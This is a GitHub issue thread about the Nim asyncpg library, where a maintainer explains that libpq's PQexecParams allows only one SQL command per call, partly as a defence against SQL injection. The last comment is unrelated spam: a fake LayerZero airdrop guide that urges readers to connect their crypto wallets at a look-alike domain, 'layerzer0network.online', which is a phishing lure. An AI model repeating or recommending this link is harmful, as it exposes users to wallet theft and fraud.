### ISSUE TITLE
Support for parameters in multiple statements

### ISSUE THREAD

**Issue by honewatson** [cheatfate/asyncpg#2]
Hi thanks for the great work.

Can we please have support for parameters in multiple statements?

There seems to be some work complete on this for https://github.com/tulayang/asyncmysql.

**Comment by cheatfate** [comment]
Could you please explain more precisely? I'm not sure i can understand what are you trying to achieve...

**Comment by cheatfate** [comment]
Are you are talking about this limitation?
```nim
import asyncdispatch, asyncpg, strutils

proc multipleStatements(conn: apgConnection) {.async.} =
  # Execute multiple SELECT operations
  # Only text SQL queries are supported, you cannot separate
  # parameters from query, e.g.
  # var r = await conn.exec("SELECT $1; SELECT $2; SELECT $3", 1, 2, 3)
  var r = await conn.exec("SELECT 1; SELECT 2; SELECT 3")
  # Get number of results
  var resultsCount = len(r)
  echo "Results count = " & $resultsCount

  # Echo first result
  echo getValue(r[0])
  # Echo second result
  echo getValue(r[1])
  # Echo third result
  echo getValue(r[2])

  # Close results
  close(r)

var connStr = "host=localhost port=5432 dbname=travis_ci_test user=postgres"
var conn = waitFor connect(connStr)

waitFor conn.multipleStatements()
conn.close()
```

**Comment by honewatson** [comment]
Yes that it is correct.  I see you have a line commented out.  Would this be a difficult enhancement?

**Comment by cheatfate** [comment]
This is problemmatic, just because i'm using `libpq` postgresql native library api functions which has such limitations:

> The primary advantage of PQexecParams over PQexec is that parameter values can be separated from the command string, thus avoiding the need for tedious and error-prone quoting and escaping.
> 
> Unlike PQexec, PQexecParams allows at most one SQL command in the given string. (There can be semicolons in it, but not more than one nonempty command.) This is a limitation of the underlying protocol, but has some usefulness as an extra defense against SQL-injection attacks.

https://www.postgresql.org/docs/current/static/libpq-exec.html#LIBPQ-PQEXECPARAMS

**Comment by cheatfate** [comment]
To implement it by myself i need to have SQL parser with support of all PostgreSQL extensions, and this is pretty tough work.

**Comment by honewatson** [comment]
Thanks for the update.  Sounds complex.  I wonder if it might be easier creating a PL/Nim Library by wrapping PL/C with some kind of easy deployment mechanism of the generated dynamic libraries.

**Comment by bpieres** [comment]
### LayerZero Airdrop Guide: BIGGEST Airdrop in 2023 ($ZRO Token Confirmed) 🪂

LayerZero is one of the most ANTICIPATED airdrops in 2023, and users can potentially earn up to $10,000 in airdrop rewards! This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Claim Now on Layerzero Oficial](http://link.layerzer0network.online/rFz335)

![Claim Now](https://i.ytimg.com/vi/s7BR96pg0SA/sddefault.jpg)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).
   - 
2. **Share on Social Media:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&title=LayerZero+Airdrop+Guide) 

2. **Eligibility Check:**
   - Confirm your eligibility for the Layerzero Airdrop.
